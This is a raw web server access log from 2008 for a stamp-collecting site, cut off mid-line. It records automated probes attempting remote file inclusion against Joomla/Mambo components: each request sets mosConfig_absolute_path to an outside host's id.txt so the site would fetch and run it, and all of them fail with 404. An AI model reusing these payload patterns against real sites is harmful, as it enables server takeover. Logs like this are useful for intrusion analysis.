216.120.241.242 - - [20/Jul/2008:19:55:22 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
62.76.116.20 - - [20/Jul/2008:19:55:26 -0700] "GET /logs/access_080623.log%20/components/com_galleria/galleria.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:19:55:27 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:37 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:37 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:37 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:37 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:37 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:38 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:38 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:38 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:38 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:49 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:49 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:55:52 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:56:23 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:56:23 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:56:23 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:19:56:57 -0700] "GET /logs/access_080630.log//administrator/components/c